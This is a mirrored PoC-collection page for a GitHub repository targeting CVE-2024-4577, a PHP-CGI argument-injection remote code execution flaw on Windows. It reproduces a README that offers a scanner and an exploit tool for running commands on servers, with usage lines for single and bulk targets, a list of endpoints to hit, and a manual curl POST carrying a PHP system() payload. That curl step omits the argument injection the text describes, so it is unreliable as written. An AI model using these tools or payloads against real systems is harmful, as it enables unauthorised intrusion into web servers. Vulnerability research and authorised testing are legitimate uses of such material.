Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-4577 PoC — PHP 操作系统命令注入漏洞

Source
https://github.com/r0otk3r/CVE-2024-4577
Associated Vulnerability
Title:PHP 操作系统命令注入漏洞 (CVE-2024-4577)
Description:PHP是一种在服务器端执行的脚本语言。 PHP存在操作系统命令注入漏洞,该漏洞源于在特定条件下,Windows系统使用“Best-Fit”行为替换命令行中的字符,这可能导致PHP CGI模块错误地将这些字符解释为PHP选项,从而泄露脚本的源代码,在服务器上运行任意PHP代码等。以下版本受到影响:8.1至8.1.29之前版本,8.3至8.3.8之前版本,8.2至8.2.20之前版本。
Readme
# CVE-2024-4577 - PHP CGI Argument Injection RCE

## Summary

CVE-2024-4577 is a critical **PHP CGI argument injection vulnerability** that affects Windows systems running PHP in CGI mode. This flaw allows remote attackers to **inject arguments** into PHP's command line via specially crafted URLs, leading to **remote code execution (RCE)**.

This repository includes:

- `CVE-2024-4577.py`: A **scanner** to detect vulnerable targets.
- `exploit.py`: An **exploit tool** that sends PHP code and executes system commands on the vulnerable server.

> ⚠️ **DISCLAIMER**  
> This project is for **educational and authorized testing** only. Any misuse of this code is not the responsibility of the author. Use responsibly and only in environments you own or have explicit permission to test.

---

## Requirements

- Python 3.x
- `requests` library

Install dependencies:

```bash
pip install -r requirements.txt
```
---

# Scanner Usage

Detect if a target is vulnerable to CVE-2024-4577:

## Single Target
```bash
python3 CVE-2024-4577.py -u http://target.com
```
![1](https://github.com/user-attachments/assets/2877a065-f568-4c9b-8b87-1bb220f1b904)

## Multiple Targets from File
```bash
python3 CVE-2024-4577.py -f urls.txt
```
![2](https://github.com/user-attachments/assets/45dbd725-4e57-4c3a-a33a-27a3ef3d6547)

## Custom Path (optional)
```bash
python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
```
### Example Vulnerable Paths
The scanner and exploit test common CGI endpoints like:
```bash
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
```
The payload bypasses cgi.force_redirect and prepends malicious PHP using php://input.

---
# Exploit Usage

Execute arbitrary system commands on a vulnerable target:

## Single Target
```bash
python3 exploit.py -u http://target.com -c "id"
```
![4](https://github.com/user-attachments/assets/027fe98c-4b0e-4729-8844-dddb460d3eb8)

## Multiple Targets from File
```bash
python3 exploit.py -f urls.txt -c "id"
```
![5](https://github.com/user-attachments/assets/01de96c5-09e8-4065-b162-484985834c01)
---
## Using curl

You can also exploit the vulnerability manually using curl
```bash
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
```
This sends a PHP payload that executes uname -a on the server and returns the output.

![3](https://github.com/user-attachments/assets/fd134d72-7849-481c-b1ce-45e63ba61187)
---

# License

This code is released under the MIT License. See LICENSE for more information.

---

## Official Channels

- [YouTube @rootctf](https://www.youtube.com/@rootctf)
- [X @r0otk3r](https://x.com/r0otk3r)
File Snapshot

 [4.0K]  /data/pocs/33066e9eb8b2977d0c2fdb473a7b409d1627da4d
├── [3.3K]  CVE-2024-4577.py
├── [2.9K]  exploit.py
├── [2.6K]  README.md
└── [  86]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.